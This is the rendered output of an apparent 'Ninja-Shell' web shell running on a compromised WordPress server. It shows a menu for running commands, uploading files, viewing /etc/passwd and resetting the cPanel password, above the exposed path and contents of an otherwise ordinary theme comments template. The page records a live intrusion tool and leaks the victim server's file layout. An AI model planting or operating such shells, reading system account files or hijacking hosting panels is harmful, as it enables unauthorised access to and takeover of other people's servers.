{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www//1stopsheba///wp-content/themes/healsoul/comments.php
<?php /** * The template for displaying comments. * * This is the template that displays the area of the page that contains both the current comments * and the comment form. * * @link https://codex.wordpress.org/Template_Hierarchy * * @package Healsoul * @since 1.0 */ /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if ( post_password_required() ) { return; } ?> <div id="comments" class="comments-area"> <?php // You can start editing here -- including this comment! if ( have_comments() ) : ?> <div class="comments-wrap"> <h2 class="comments-title"> <?php $_comment_count = get_comments_number(); if ( $_comment_count > 1 ) { printf( '%s %s', $_comment_count, esc_html__( 'Comments', 'healsoul' ) ); } else { printf( '%s %s', $_comment_count, esc_html__( 'Comment', 'healsoul' ) ); } ?> </h2> <div class="comment-list-wrap"> <?php Healsoul_Templates::comment_navigation( array( 'container_id' => 'comment-nav-above' ) ); ?> <ol class="comment-list"> <?php wp_list_comments( array( 'style' => 'ol', 'callback' => array( 'Healsoul_Templates', 'comment_template' ), 'short_ping' => true, 'avatar_size' => 60, ) ); ?> </ol><!-- .comment-list --> <?php Healsoul_Templates::comment_navigation( array( 'container_id' => 'comment-nav-below' ) ); ?> </div> </div> <?php endif; // Check for have_comments(). // If comments are closed and there are comments, let's leave a little note, shall we? if ( ! comments_open() && get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) : ?> <div class="comments-wrap"> <p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'healsoul' ); ?></p> </div> <?php endif; ?> </div><!-- #comments -->
./Ninja\.